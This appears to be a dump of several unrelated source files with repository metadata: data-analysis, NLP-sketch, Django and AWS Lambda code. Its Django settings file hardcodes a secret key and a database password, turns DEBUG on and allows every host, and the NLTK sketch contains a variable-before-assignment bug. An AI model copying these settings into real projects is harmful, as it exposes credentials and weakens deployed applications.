            response = failure.value.response
            self.logger.error('HttpError %s on %s', response.status, req_url)
        elif failure.check(DNSLookupError):
            self.logger.error('DNSLookupError on %s', req_url)
        elif failure.check(ConnectionRefusedError):
            self.logger.error('ConnectionRefusedError on %s', req_url)
        elif failure.check(TimeoutError, TCPTimedOutError):
            self.logger.error('TimeoutError on %s', req_url)
        elif failure.check(ResponseNeverReceived):
            self.logger.error('ResponseNeverReceived on %s', req_url)
        else:
            self.logger.error('UnpectedError on %s', req_url)
            self.logger.error(repr(failure))
| [
"1370153124@qq.com"
] | 1370153124@qq.com |
42428250f3f843297cf0dea506a3f02218b3db63 | fb00808d44e18c7b27a8f86b553c586d4033504f | /sandbox/factory/factory_metrics.py | abb3cb2f34553b13d0e0d4696ef04c0988509187 | [] | no_license | akamlani/datascience | 4f1bab94a1af79b7f41339b5a1ba4acc965d4511 | 62f4d71f3642f89b4bbd55d7ef270321b983243e | refs/heads/master | 2021-01-17T10:11:11.069207 | 2016-12-29T04:33:49 | 2016-12-29T04:33:49 | 24,774,956 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 15,565 | py | from __future__ import division
import pandas as pd
import numpy as np
import argparse
import os
import re
import json
import sys
import warnings
from datetime import datetime
import matplotlib.pyplot as plt
import seaborn as sns
warnings.filterwarnings("ignore")
### Create Tabular Structure
def get_folder_attrs(path):
    """Return the directories and files directly under *path*, plus counts.

    *path* must end with a path separator (entries are joined by plain string
    concatenation, matching the callers in this module).

    Returns a dict with keys root_dirs / num_rootdirs / root_files /
    num_rootfiles.  Rewritten to run on both Python 2 and 3: the original used
    py2-only tuple-unpacking lambdas and called len() on map objects, which
    raises TypeError on Python 3.
    """
    root_attr = {name: os.path.isdir(path + name) for name in os.listdir(path)}
    root_dirs = [name for name, is_dir in root_attr.items() if is_dir]
    root_files = [name for name, is_dir in root_attr.items() if not is_dir]
    return {
        'root_dirs': root_dirs,
        'num_rootdirs': len(root_dirs),
        'root_files': root_files,
        'num_rootfiles': len(root_files)
    }
def extract_subfolder_data(subfolder, rootpath):
    """Walk rootpath+subfolder and map each directory (relative to *rootpath*,
    minus a leading 'data/') to the de-duplicated file stems it contains.

    Directories with fewer than two files are skipped (preserved from the
    original; presumably single-file dirs are incomplete runs -- confirm).
    """
    root_data_dict = {}
    prefix = 'data/'
    for (dirpath, dirnames, filenames) in os.walk(rootpath + subfolder):
        if len(filenames) > 1:
            key = dirpath.split(rootpath)[1]
            # The original used str.strip('data/'), which strips any of the
            # characters {d, a, t, /} from BOTH ends and can corrupt keys;
            # remove the literal prefix instead.
            if key.startswith(prefix):
                key = key[len(prefix):]
            root_data_dict[key] = list(
                set(filename.split('.')[0] for filename in filenames))
    return root_data_dict
def create_units(status_dict, root_path):
    """Build one tabular record per executed unit test.

    *status_dict* maps '<STATUS>/<yyyymmdd>' keys to lists of file stems of
    the form '<name>_<yyyymmdd>_<hhmmss>'.  Returns a DataFrame with columns
    file_name / unit_name / unit_status / date_record plus derived date/hour.

    Rewritten to collect rows and build the frame once: DataFrame.append was
    deprecated and removed in pandas 2.0, and per-row append is quadratic.
    """
    records = []
    for key, stems in status_dict.items():
        unit_type, date_rec = [part.strip() for part in key.split("/")]
        for stem in stems:
            file_name = "_".join(stem.split("_")[:-2])
            ts_rec = "".join(stem.split("_")[-2:])
            # Skip sub-directories that slipped into the listing (check kept
            # verbatim from the original, including the missing separator).
            if os.path.isdir(root_path + key + stem):
                continue
            ts_rec = datetime.strptime(ts_rec, '%Y%m%d%H%M%S')
            # Failure stems may carry extra suffixes; the unit name is the
            # first underscore-separated token in that case.
            unit_name = file_name.split("_")[0].strip() if unit_type == 'FAIL' else file_name
            records.append({'file_name': file_name, 'unit_name': unit_name,
                            'unit_status': unit_type, 'date_record': ts_rec})
    df_units = pd.DataFrame(records)
    df_units['date'] = df_units.date_record.dt.date
    df_units['hour'] = df_units.date_record.dt.hour
    return df_units
def create_dir_structure():
    """Ensure logs/images folders exist, dump the root-dir attributes to a log
    file and return them; exits the process when the data folder is missing.

    Relies on the module-level path globals assigned under __main__.
    NOTE(review): .iteritems() and the bare print statements below make this
    module Python 2-only.
    """
    if not os.path.exists(data_path):
        print("No Data Present")
        sys.exit()
    else:
        if not os.path.exists(log_path): os.makedirs(log_path)
        if not os.path.exists(image_path): os.makedirs(image_path)
        if not os.path.exists(config_path): print("\nNo Config File: Using default config\n")
    attrs = get_folder_attrs(fixture_path)
    # Drop the (potentially long) file list before logging.
    params = {k:v for k,v in attrs.iteritems() if k != 'root_files'}
    filename = log_path + file_prefix + 'rootdir_attr.txt'
    pd.Series(params, name='attributes').to_csv(filename, sep='\t')
    print "Root Dir Attributes:"; print pd.Series(params, name='attributes')
    return attrs
### Aggregation Calculations
def calc_agg_stats(df_units):
    """Compute pass/fail counts and percentages at both test level and unit
    level, log them to a file, and return the metrics Series."""
    # Units tested more than once, and the failing runs among them.
    df_unit_counts = df_units.groupby('unit_name')['unit_status'].count()
    df_mult_tests = df_unit_counts[df_unit_counts > 1].sort_values(ascending=False)
    df_mult_failures = df_units[(df_units.unit_name.isin(df_mult_tests.index)) & (df_units.unit_status == 'FAIL')]
    # aggregate statistics
    n_units, n_tests = len(df_units.unit_name.unique()), len(df_units.unit_name)
    n_units_mult_failures, n_mult_failures = (len(df_mult_tests), df_mult_tests.sum())
    # executed tests that are passing and failing
    # NOTE(review): tuple-unpacking value_counts() assumes PASS outnumbers
    # FAIL (value_counts sorts by frequency) -- confirm for small datasets.
    n_pass_tests, n_fail_tests = df_units.unit_status.value_counts()
    n_pass_tests_pct, n_fail_tests_pct = n_pass_tests/n_tests, n_fail_tests/n_tests
    # there are some boards that show up both in pass and failure ('LB1537330100294')
    # find the lastest timestamp and verify it must be a PASS to update true failure count
    n_pass_units = len(df_units[df_units.unit_status=='PASS']['unit_name'].unique())
    n_fail_units = len(df_units[df_units.unit_status=='FAIL']['unit_name'].unique())
    pass_units = set(df_units[df_units.unit_status=='PASS']['unit_name'].unique())
    fail_units = set(df_units[df_units.unit_status=='FAIL']['unit_name'].unique())
    units_overlap = (pass_units & fail_units)
    df_units_overlap = df_units[df_units.unit_name.isin(units_overlap)].sort_values(by='unit_name')
    df_units_overlap = df_units_overlap.groupby('unit_name')[['date_record', 'unit_status']].max()
    n_units_overlap = df_units_overlap[df_units_overlap.unit_status != 'PASS'].shape[0]
    # Units whose most recent run passed are removed from the failure count.
    n_fail_units = n_fail_units - (len(units_overlap) - n_units_overlap)
    n_pass_units_pct, n_fail_units_pct = n_pass_units/n_units, n_fail_units/n_units
    # create a dict for processing
    data_metrics = pd.Series({
        'num_units': n_units, 'num_tests': n_tests,
        'num_units_multiple_failures': n_units_mult_failures, 'num_tests_multiple_failures': n_mult_failures,
        'num_pass_tests': n_pass_tests, 'num_fail_tests': n_fail_tests,
        'num_pass_tests_pct': n_pass_tests_pct, 'num_fail_tests_pct': n_fail_tests_pct,
        'num_pass_units': n_pass_units, 'num_fail_units': n_fail_units,
        'num_pass_units_pct': n_pass_units_pct, 'num_fail_units_pct': n_fail_units_pct,
        'num_units_overlapped_passfail': n_units_overlap
    }).sort_values(ascending=False)
    filename = log_path + file_prefix + 'status_metrics.txt'
    write_log(filename, data_metrics, "\nUnit/Experimental Test Metrics:", log=True, format='pretty')
    return data_metrics
def calc_agg_dated(df_units):
    """Log units-served counts per (date, hour) and hourly summary statistics;
    return the overall hourly summary Series.  Uses module path globals."""
    # date,hourly multi-index
    df_agg_date_hourly = df_units.groupby(['date','hour'])['unit_name'].count()
    df_agg_date_hourly.name = 'units_served'
    df_agg_date_hourly.columns = ['units_served']
    filename = log_path + file_prefix + 'units_served_datehourly.txt'
    write_log(filename, df_agg_date_hourly, format='Pretty')
    # hourly aggregations
    df_stats_hourly = df_agg_date_hourly.reset_index()
    df_agg_hourly = df_stats_hourly.groupby('hour')['units_served'].agg([np.mean, np.median, np.std], axis=1)
    df_agg_hourly = pd.concat( [ df_units.groupby('hour')['unit_name'].count(), df_agg_hourly], axis=1 )
    df_agg_hourly.columns = ['count','average', 'median', 'std']
    filename = log_path + file_prefix + 'units_served_hourly_stats.txt'
    write_log(filename, df_agg_hourly, header=['Count', 'Average', 'Median', 'Std'])
    # hourly summary statistics
    ds_agg_summary = pd.Series({
        'mean': df_agg_hourly['count'].mean(),
        'median': df_agg_hourly['count'].median(),
        'std': df_agg_hourly['count'].std()}, name='units_served_hourly')
    filename = log_path + file_prefix + 'units_served_hourly_summary.txt'
    write_log(filename, ds_agg_summary, header=["Units Served Hourly"])
    s = "Units Served Hourly:\nMean: {0:.2f}, Median: {1:.2f}, STD: {2:.2f}"
    print s.format(df_agg_hourly['count'].mean(), df_agg_hourly['count'].median(), df_agg_hourly['count'].std())
    return ds_agg_summary
def calc_agg_failures(ds, datapath):
    """Re-open the CSV behind unit record *ds* and count failing rows per TEST
    label (a row fails when STATUS == 1 or VALUE == 'FAIL')."""
    filepath = datapath + ds.unit_status + "/" + "".join(ds.date.strftime('%Y%m%d')) + "/"
    filename = filepath + ds.file_name + ds.date_record.strftime('_%Y%m%d_%H%M%S') + '.csv'
    df = pd.read_csv(filename)
    # extract test failures for a given failure and append to
    df_fail = df[(df.STATUS == 1) | (df.VALUE == 'FAIL')]
    df_test_failures = df_fail.groupby('TEST')['VALUE'].count()
    # keep track of occurring failures
    return df_test_failures
### Configuration Aggregations
def define_default_configs():
    """Fallback test-pattern configuration used when no config.json exists."""
    default_voltage = {
        'name': 'voltagedefault',
        'prefix': ['V'],
        'pattern': ['BOLT', 'PWR'],
    }
    return [default_voltage]
def match(frame, start_cond, pattern_cond):
    """Select rows of *frame* whose TEST label matches either condition and
    pivot them into a single-row frame whose columns are the TEST labels.

    *start_cond*: labels must start with one of these prefixes.
    *pattern_cond*: labels must contain one of these substrings.
    """
    # define regex patterns
    pattern_regex = "|".join([p for p in pattern_cond])
    start_regex = "|".join([p for p in start_cond])
    start_regex = "^("+ start_regex +")"
    # create series
    df_flt = frame[(frame.TEST.str.contains(pattern_regex)) | (frame.TEST.str.contains(start_regex))]
    df_flt = df_flt.reset_index()
    df_flt = df_flt[['TEST','VALUE']].T
    # .ix was removed in pandas 1.0; .loc is the supported label indexer here.
    df_flt.columns = [df_flt.loc['TEST']]
    df_flt = df_flt.drop('TEST', axis=0).reset_index().drop('index',axis=1)
    return df_flt
def match_config_patterns(ds, datapath, name, start_cond, pattern_cond):
    """Load the CSV behind the unit record *ds* and return the matched
    TEST -> VALUE pairs (see match()) as a Series.  *name* is accepted for
    signature compatibility with calc_agg_config but is unused here.
    """
    filepath = datapath + ds.unit_status + "/" + "".join(ds.date.strftime('%Y%m%d')) + "/"
    filename = filepath + ds.file_name + ds.date_record.strftime('_%Y%m%d_%H%M%S') + '.csv'
    df = pd.read_csv(filename)
    df_patterns = match(df, start_cond, pattern_cond)
    # dict.iteritems() is Python 2-only; items() behaves the same on 2 and 3.
    return pd.Series({k: v.values[0] for k, v in dict(df_patterns).items()})
def calc_agg_config(frame, datapath, name, start_cond, pattern_cond):
    """Collect the configured measurement columns for every unit record in
    *frame*, aggregate them (mean/median/std/iqr/min/max), log and return."""
    params = (name, start_cond, pattern_cond)
    df_agg_config = frame.apply(lambda x: match_config_patterns(x, datapath, *params), axis=1).astype('float')
    # calculate aggregations
    iqr = (df_agg_config.dropna().quantile(0.75, axis=0) - df_agg_config.dropna().quantile(0.25, axis=0))
    df_metric = pd.concat([df_agg_config.mean(axis=0), df_agg_config.median(axis=0), df_agg_config.std(axis=0),
                            iqr, df_agg_config.min(axis=0), df_agg_config.max(axis=0)], axis=1)
    df_metric.columns = ['mean', 'median', 'std', 'iqr', 'min', 'max']
    df_metric.name = name
    # save to log file
    filename = log_path + file_prefix + name + '_stats.txt'
    write_log(filename, df_metric, header=["Failure Counts"], format='pretty')
    return df_metric
### Plots/Visualizations
def plot_units_metrics(metrics, titles):
    """Render a three-panel horizontal bar chart (one panel per metric Series)
    and save it under images/ (uses module globals image_path/file_prefix)."""
    fig, (ax1,ax2,ax3) = plt.subplots(1,3, figsize=(20,7))
    for data,title,axi in zip(metrics, titles, (ax1,ax2,ax3)):
        sns.barplot(data, data.index, ax=axi)
        axi.set_title(title, fontsize=16, fontweight='bold')
        for tick in axi.yaxis.get_major_ticks():
            tick.label.set_fontsize(14)
            tick.label.set_fontweight('bold')
        for tick in axi.xaxis.get_major_ticks():
            tick.label.set_fontsize(14)
            tick.label.set_fontweight('bold')
    fig.set_tight_layout(True)
    plt.savefig(image_path + file_prefix + 'units_status_metrics.png')
def plot_units_dailyhour(df_units):
    """Bar chart of units tested per hour, one series per date; saved under
    images/.  Mutates df_units by (re)adding the date/hour columns."""
    # units per hour tested
    fig = plt.figure(figsize=(14,6))
    df_units['date'] = df_units.date_record.dt.date
    df_units['hour'] = df_units.date_record.dt.hour
    df_units_dated = df_units.groupby(['date','hour'])['unit_name'].count()
    df_units_dated.unstack(level=0).plot(kind='bar', subplots=False)
    plt.ylabel("Num Units Tested", fontsize=10, fontweight='bold')
    plt.xlabel("Hour", fontsize=10, fontweight='bold')
    plt.title("Distribution per number of units tested", fontsize=13, fontweight='bold')
    fig.set_tight_layout(True)
    plt.savefig(image_path + file_prefix + 'units_tested_datehour.png')
def plot_units_hourly(df_units):
    """Bar chart of units tested per hour aggregated over all dates; saved
    under images/ (uses module globals image_path/file_prefix)."""
    fig = plt.figure(figsize=(14,6))
    df_agg_hourly = df_units.groupby(['hour'])['unit_name'].count()
    df_agg_hourly.plot(kind='bar')
    plt.ylabel("Num Units Tested", fontsize=10, fontweight='bold')
    plt.xlabel("Hour", fontsize=10, fontweight='bold')
    plt.title("Hourly Distribution per number of units tested", fontsize=10, fontweight='bold')
    fig.set_tight_layout(True)
    plt.savefig(image_path + file_prefix + 'units_tested_hourly.png')
def plot_failure_metrics(frame):
    """Horizontal bar chart of failure counts per test type; saved under
    images/ (uses module globals image_path/file_prefix)."""
    fig = plt.figure(figsize=(14,6))
    sns.barplot(frame, frame.index)
    for tick in plt.gca().yaxis.get_major_ticks():
        tick.label.set_fontsize(8)
        tick.label.set_fontstyle('italic')
        tick.label.set_fontweight('bold')
    plt.xlabel('Number of Failures', fontsize=10, fontweight='bold')
    plt.title("Failure Test Types Distribution", fontsize=10, fontweight='bold')
    fig.set_tight_layout(True)
    plt.savefig(image_path + file_prefix + 'units_failure_metrics.png')
### Logging
def write_log(filename, frame, header=None, log=False, format=None):
    """Persist a pandas Series/DataFrame *frame* to *filename*.

    When *format* is truthy, the repr() of the frame is written ('pretty'
    mode); otherwise a tab-separated CSV is written with *header*.  With
    log=True (pretty mode only, as in the original) *header* and the frame
    are also echoed to stdout.
    """
    if format:
        with open(filename, 'w') as f:
            f.write(frame.__repr__())
        if log:
            # print() with a single argument behaves identically on Python 2
            # and 3; the original used py2-only print statements here.
            print(header)
            print(frame)
            print("")
    else:
        frame.to_csv(filename, sep='\t', float_format='%.2f', header=header)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Factory Unit Metrics')
parser.add_argument('-f', '--fixture', default='fixture', nargs='?', help='default=fixture')
args = parser.parse_args()
curr_date = "".join( str(datetime.now().date()).split("-") )
fixture_path = args.fixture + '/'
data_path = fixture_path + 'data/'
log_path = fixture_path + 'logs/' + curr_date + '/'
image_path = fixture_path + 'images/' + curr_date + '/'
config_path = fixture_path + 'config/'
file_prefix = args.fixture.split("/")[-1] + '_'
root_fixture_path = fixture_path if fixture_path.startswith('/') else os.getcwd() + '/' + fixture_path
root_data_path = data_path if fixture_path.startswith('/') else os.getcwd() + '/' + data_path
# create folder structure if necessary, create tabular dataframe format
attrs = create_dir_structure()
meta_folders = ['logs', 'images', 'config']
meta_path = '[' + '|'.join(meta_folders) + ']'
data_folders = filter(lambda x: x not in meta_folders, attrs['root_dirs'])
data = [extract_subfolder_data(dir_name, root_fixture_path) for dir_name in attrs['root_dirs']]
data_dict = {k: v for d in data for k, v in d.items() if not re.compile(meta_path).search(k)}
df_aggunits = create_units(data_dict, root_data_path)
# Apply Core Aggregations, Log to Files
ds_metrics = calc_agg_stats(df_aggunits).sort_values(ascending=False)
ds_metrics_summary = calc_agg_dated(df_aggunits)
ds_failures = df_aggunits.apply(lambda x: calc_agg_failures(x, data_path), axis=1)
ds_failures = ds_failures.sum().astype(int)
ds_failures = ds_failures.drop('OVERALL_TEST_RESULT', axis=0).sort_values(ascending=False)
filename = log_path + file_prefix + 'testfailuretype_stats.txt'
write_log(filename, ds_failures[:10], header="\nTop 10 Failure Test Types", log=True, format='pretty')
# Apply Configuration Aggregations, Log to Files
if os.path.exists(config_path):
with open(config_path + 'config.json') as f:
config_json = json.load(f)
config_tests = config_json['tests']
else:
config_tests = define_default_configs()
for config in config_tests:
params = (config['name'], config['prefix'], config['pattern'])
calc_agg_config(df_aggunits, data_path, *params)
# Apply Plots
ds_metrics_units = ds_metrics.ix[['num_units', 'num_pass_units', 'num_fail_units',
'num_units_multiple_failures', 'num_units_overlapped_passfail']]
ds_metrics_tests = ds_metrics.ix[['num_tests', 'num_pass_tests',
'num_fail_tests','num_tests_multiple_failures']]
ds_metrics_pct = ds_metrics.ix[['num_pass_units_pct', 'num_pass_tests_pct',
'num_fail_tests_pct', 'num_fail_units_pct']]
plot_units_metrics((ds_metrics_units, ds_metrics_tests, ds_metrics_pct.sort_values(ascending=False)),
("Unit Metrics", "Pass/Failure Counts", "Pass/Fail Test Percentages"))
plot_units_dailyhour(df_aggunits)
plot_units_hourly(df_aggunits)
plot_failure_metrics(ds_failures)
| [
"akamlani@gmail.com"
] | akamlani@gmail.com |
91e13a948d4043377389cee8b22692d079ff2ca0 | 132dee8451b3b3579feb52bae0a061dedfb0f9ba | /tessoku-book/A02/main.py | 61396967e92235846704caf46740671b2980458e | [] | no_license | huyu398/AtCoder | c4f9325ec0055f44b43210b3150f7eaaf4005a68 | c94c07d80ac055f94e2b9f70f6340c7262833c6d | refs/heads/master | 2023-04-29T07:42:12.508447 | 2023-04-22T16:32:06 | 2023-04-22T16:32:06 | 205,974,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | #!/usr/bin/env python3
import sys
YES = "Yes" # type: str
NO = "No" # type: str
def solve(N: int, X: int, A: "List[int]"):
print(YES if X in A else NO)
return
# Generated by 2.12.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
N = int(next(tokens)) # type: int
X = int(next(tokens)) # type: int
A = [int(next(tokens)) for _ in range(N)] # type: "List[int]"
solve(N, X, A)
if __name__ == '__main__':
main()
| [
"huyu.sakuya4645@gmail.com"
] | huyu.sakuya4645@gmail.com |
9153e9b835d0f7030a7cc13f8e87258d396f0dd6 | 167daddd0e4f4562de7cbf0150e56c7154d6c474 | /sketch_nltk.py | 264633dc0b6d42f3b3af419fde5e9667a11fe661 | [] | no_license | vikranth22446/instagraders | 0d4fa9155075207cd59bed22e5518c1512d6c780 | 7a8a0e47e989cf6a2bc38f20b248fb9dab4b82e4 | refs/heads/master | 2021-04-15T09:29:52.374456 | 2018-03-25T15:16:56 | 2018-03-25T15:16:56 | 126,655,700 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,473 | py | from itertools import product
import nltk
from nltk import PunktSentenceTokenizer
from nltk.corpus import stopwords, state_union, wordnet, wordnet_ic
from nltk.tokenize import word_tokenize
from nltk.stem import PorterStemmer
ps = PorterStemmer()
example_sentence = "This is an example off stopping word filteration"
stoplist = set(stopwords.words("english"))
filtered_words = [ps.stem(w) for w in word_tokenize(example_sentence) if w not in stoplist]
print(filtered_words)
def get_pps():
custom_sent_tokenizer = PunktSentenceTokenizer(sample_token)
sample_token = state_union.raw("2005-GWBush.txt")
real = state_union.raw("2005-GWBush.txt")
tokenized = custom_sent_tokenizer.tokenize(real)
try:
for i in tokenized:
words = nltk.word_tokenize(i)
tagged = nltk.pos_tag(words)
namedEntity = nltk.ne_chunk(tagged, binary=True)
namedEntity.draw()
print(tagged)
except Exception:
print("e")
def get_syns(word):
synomys = []
antonyms = []
for syn in wordnet.synsets(word):
for l in syn.lemmas():
synomys.append(l.name)
if l.antonyms():
antonyms.append(l.antonyms()[0].name())
print(synomys)
print(antonyms)
return synomys
# u = set.intersection(set("love"), set(get_syns("romance")))
# print(u)
#
# cars = wordnet.synsets("car", "n")
# bikes = wordnet.synsets("bike", "n")
#
# brown_ic = wordnet_ic.ic("ic-brown.dat")
# semcor_ic = wordnet_ic.ic("ic-semcor.dat")
#
# for car in cars:
# for bike in bikes:
# jcs_brown = car.jcn_similarity(bike, brown_ic)
# jcs_semcor = car.jcn_similarity(bike, semcor_ic)
# print("JCS(%s, %s) = (%.4f, %.4f)" %
# (str(car), str(bike), jcs_brown, jcs_semcor))
# get_syns()
#
# actual = wordnet.synsets('worse')[0]
# predicted = wordnet.synsets('better')[0]
# similarity = actual.jcn_similarity(actual, predicted)
# print(similarity)
# #
# from itertools import product
#
love = wordnet.synsets('dog')[0].definition()
hatred = wordnet.synsets('cheese')[0].definition()
import spacy
import spacy
nlp = spacy.load("en")
tokens = nlp("love")
tokens2 = nlp("romance")
print(tokens.similarity(tokens2))
# for token1 in tokens:
# for token2 in tokens:
# print(token1.similarity(token2))
# print(love)
# print(hatred)
# nlp = spacy.load('en')
# doc1 = nlp("dog")
# doc2 = nlp("cheese")
# print(doc1.similarity(doc2))
# allsyns1 = set(ss for word in ["hatred"] for ss in wordnet.synsets(word))
# allsyns2 = set(ss for word in ["sticks"] for ss in wordnet.synsets(word))
# best = max((wordnet.wup_similarity(s1, s2) or 0, s1, s2) for s1, s2 in
# product(allsyns1, allsyns2))
# print(best)
# (0.9411764705882353, Synset('command.v.02'), Synset('order.v.01'))
# allsyns1 = set(ss for ss in wordnet.synsets("good"))
# allsyns2 = set(ss for ss in wordnet.synsets("bad"))
# best = max((wordnet.wup_similarity(s1, s2) or 0, s1, s2) for s1, s2 in
# product(allsyns1, allsyns2))
# print(best)
# (0.9411764705882353, Synset('command.v.02'), Synset('order.v.01'))
# from nltk.corpus import wordnet as wn
# from nltk.corpus import wordnet_ic
#
# cars = wordnet.synset("romance.n.01")
# bikes = wordnet.synset("love.n.01")
#
# brown_ic = wordnet_ic.ic("ic-brown.dat")
# semcor_ic = wordnet_ic.ic("ic-semcor.dat")
# jcs_brown = cars.jcn_similarity(bikes, brown_ic)
# jcs_semcor = cars.jcn_similarity(bikes, semcor_ic)
# print("JCS(%s, %s) = (%.4f, %.4f)" %
# (str(cars), str(bikes), jcs_brown, jcs_semcor))
# w1 = wordnet.synsets("greater", pos="a")[0]
# w2 = wordnet.synsets("worse", pos="a")[0]
# print(w1, w2)
# print(w1.wup_similarity(w2))
# import nltk, string
# from sklearn.feature_extraction.text import TfidfVectorizer
#
# nltk.download('punkt') # if necessary...
#
# stemmer = nltk.stem.porter.PorterStemmer()
# remove_punctuation_map = dict((ord(char), None) for char in string.punctuation)
#
#
# def stem_tokens(tokens):
# return [stemmer.stem(item) for item in tokens]
#
#
# '''remove punctuation, lowercase, stem'''
#
#
# def normalize(text):
# return stem_tokens(nltk.word_tokenize(text.lower().translate(remove_punctuation_map)))
#
#
# vectorizer = TfidfVectorizer(tokenizer=normalize, stop_words='english')
#
#
# def cosine_sim(text1, text2):
# tfidf = vectorizer.fit_transform([text1, text2])
# return ((tfidf * tfidf.T).A)[0, 1]
#
#
# print(cosine_sim(love, hatred))
| [
"rama22446@gmail.com"
] | rama22446@gmail.com |
84f4ac81c70027de06bdc88e00596f7f7a3f14cf | f93dd06552ee4723aa89374a970f84c37b75d0d3 | /helpme/settings.py | 9da51704a77be82dff0df287964d4d06ca31c461 | [] | no_license | prashntt/helpme | af3afb77120c1e23477fb9f16a1842c962f474a5 | c6f8376697e682f6e956580ca885c7ddb11fb93a | refs/heads/master | 2020-04-18T18:17:06.933453 | 2019-02-02T14:50:40 | 2019-02-02T14:50:40 | 167,679,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,477 | py | """
Django settings for helpme project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nj^ga_%!nwd6w2txy7vr@$j2%mo896kc7#y72(&q6x&k_*e8&&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'construction',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'helpme.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['construction'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'helpme.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'django_project',
'USER': 'postgres',
'PASSWORD': 'Administrator',
'HOST': os.environ['POSTGRESQL_SERVICE_HOST'],
'PORT': os.environ['POSTGRESQL_SERVICE_PORT'],
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = 'home'
| [
"prashantupadhyay1020@gmail.com"
] | prashantupadhyay1020@gmail.com |
a38fb69ca2e13a0b02c9086e4b606e71e89e12af | 9e68a08ae6a384e7596f253129555119c8139dd5 | /scripts/backup_hatenafotolife/backup_hatenafotolife.py | f336ddcb97bd65799b2fdef29d4edaf49a11374d | [] | no_license | yoheia/yoheia | 28446a20a12c00c7d01851ad72c1d0c203ed958e | 46dd39ac9b162e8716bffb4dcc306f7943308252 | refs/heads/master | 2022-08-20T06:49:36.160426 | 2022-07-20T22:12:16 | 2022-07-20T22:12:16 | 249,028 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | # -*- coding: utf-8 -*-
import os
import re
import boto3
import urllib2
from bs4 import BeautifulSoup
def lambda_handler(event, context):
target_uri= 'http://f.hatena.ne.jp/yohei-a/rss'
s3_bucket_name = 'hatenafotolife'
work_dir = '/tmp'
html = urllib2.urlopen(target_uri)
soup = BeautifulSoup(html, 'html.parser')
s3 = boto3.client('s3')
for item in soup.find_all("hatena:imageurl"):
img_uri = item.contents[0]
img_filename = os.path.basename(img_uri)
r = urllib2.urlopen(img_uri)
f = open(work_dir + '/' + img_filename, "wb")
f.write(r.read())
r.close()
f.close()
s3.upload_file(work_dir + '/' + img_filename, s3_bucket_name, img_filename)
return 1
| [
"yohei.az@gmail.com"
] | yohei.az@gmail.com |
17070b67e50ec67597e3d5cfb695a3a57b0f538e | 2f9fe1be686ed1765e74c01d8f771e4d1c0e9d0f | /users/views.py | 1cf736953fb478815157111d269bcf9dc9fd5b4e | [] | no_license | nexto123/music-app | 524210faaf0c6fa9e0d6719e82cf68971f003808 | fa66539895f853283c89646a78790f915e3c25e7 | refs/heads/master | 2022-12-16T21:25:57.728861 | 2019-10-12T08:33:32 | 2019-10-12T08:33:32 | 202,499,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,263 | py | from django.urls import reverse_lazy, reverse
from django.http import request
from allauth.account.signals import user_signed_up
from django.shortcuts import render, get_object_or_404, redirect
from .models import UserProfile, CustomUser
from bucket.settings import AUTH_USER_MODEL
from django.views.generic import (TemplateView, ListView,
DetailView, CreateView,
UpdateView, DeleteView)
from .forms import CustomUserCreationForm, UserProForm
from django.contrib import messages
##To send a message to a view ."example is : messages.error(request,'your bla bla bla')"
#Obselete not in use now
class SignUpView(CreateView):
form_class = CustomUserCreationForm
success_url = reverse_lazy('login')
template_name = 'account/signup.html'
#Detail Views
# class ProfileDetailView(DetailView):
# model = UserProfile
class UserProfileUpdateView(UpdateView):
model = UserProfile
template_name_suffix = '_update_form'
form_class = UserProForm
# fields = ('display_name','description', 'website', 'phone', 'country', 'county', 'image', 'created_date')
